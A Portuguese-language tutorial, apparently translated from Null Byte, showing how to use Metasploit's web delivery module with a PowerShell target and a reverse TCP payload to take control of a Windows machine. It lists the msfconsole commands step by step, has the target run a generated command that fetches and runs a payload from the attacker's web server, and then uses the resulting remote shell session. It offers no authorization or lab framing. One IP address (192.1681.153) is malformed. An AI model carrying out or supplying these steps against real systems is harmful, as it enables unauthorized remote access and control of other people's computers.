Kali Linux Metasploit Web Delivery para Windows

No tutorial anterior  , analisamos como usar a exploração de entrega da Web do Metasploitpara criar um script para se conectar a uma máquina UNIX, Linux ou OS X usando o Python. Agora neste tutorial vamos fazer para sistema windows.

Embora a exploração de entrega na Web funcione em sistemas Windows que tenham o Python instalado, poucos sistemas Windows realmente possuem o Python instalado, enquanto que quase UNIX, Linux e OS X possuem o Python instalado por padrão. Felizmente, esses sistemas Windows possuem o PowerShell instalado por padrão e podemos usá-lo com a exploração de entrega de Metasploit para assumir o controle desses sistemas.

Neste tutorial, usaremos a exploração de entrega da Web Metasploit para assumir o controle de um sistema Windows através do seu PowerShell.

Passo 1

Iniciar o Metasploit

Para começar, dispare o seu sistema Kali , abra um terminal e inicie o Metasploit .

kali> msfconsole

metaexploit kali linux

metaexploit kali linux

Etapa 2

Carregando a exploração da entrega na Web

Como já mencionado acima, usar a entrega da web da Metasploit é muito similar à entrega na web nos sistemas Unix, Linux e OS X, exceto que os sistemas Windows não possuem o Python instalado por padrão. Mas eles têm o Windows PoweShell , e há um módulo de entrega na web para isso.

Vamos carregar a exploração da entrega na web em Metasploit:

msf > use exploit/multi/script/web_delivery

Em seguida, precisamos definir o LHOST e o LPORT exatamente como fizemos com a explicação de entrega da web Unix/Linux/OS X

msf> set LHOST 192.1681.153

msf> set LPORT 4444

Em seguida, precisamos configurar o URIPATH. Isso pode ser configurado para tudo o que você quiser. Eu configurei aqui para “powersploit”, mas você pode configurá-lo para qualquer coisa que você gosta.

msf> set URIPATH powersploit

Passo 3Defina o destino para o PowerShell

Por padrão, o recurso de entrega na Web no Metasploit usa scripts Python. Para usar a opção PowerShell baseada no Windows , precisamos definir o alvo como 2.

msf> set target 2

Com o alvo definido para 2, o Metasploit criará um script do PowerShell quando estivermos prontos para explorar.

Passo 4

Defina a carga útil

Por último, precisamos configurar a carga útil. Vamos usar a carga útil do windows/ powershell_reverse_tcp .

msf> set payload windows/powershell_reverse_tcp

Antes de iniciar o exploit, configure cheques as opções para ver se todos nós estão configurados corretamente.

Agora, podemos digitar exploit e o Metasploit iniciará um pequeno servidor web em segundo plano e gerará um comando para que possamos usar no sistema Windows.

Em seguida, abra um prompt de comando no sistema Windows de destino e execute esse comando como abaixo.

Quando você atingiu enter, esse comando abrirá uma conexão à máquina de ataque.

Agora, no sistema de ataque, podemos verificar se a sessão foi aberta digitando:

sessões -l

Como você pode ver acima, temos uma sessão aberta com uma ID de 1. Podemos usar essa sessão digitando:

sessões -i 1

Onde 1 é o ID da sessão. Se a ID da sessão for diferente, como 2, 3, etc., você deve usar essa ID no comando acima.

Agora temos uma sessão na máquina do Windows. Sucesso! Agora podemos verificar para ver os processos em execução no sistema de destino digitando:

PS C: \Users\OTW > Get-Process

Agora, que estamos conectados ao PowerShell da máquina Windows, podemos executar qualquer um dos “comandos de comando” da PowerShell , bem como os comandos Linux mais comuns.

 

 

 

 

Fonte: null-byte.wonderhowto.com

Você pode gostar...

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *